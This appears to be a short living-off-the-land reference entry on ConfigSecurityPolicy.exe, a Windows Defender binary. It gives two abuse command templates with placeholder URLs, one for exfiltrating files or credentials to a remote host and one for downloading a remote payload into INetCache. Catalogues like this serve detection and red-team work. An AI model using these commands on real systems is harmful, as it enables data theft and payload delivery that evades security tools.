Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Upload file, credentials or data exfiltration in general
ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
It will download a remote payload and place it in INetCache.
ConfigSecurityPolicy.exe {REMOTEURL}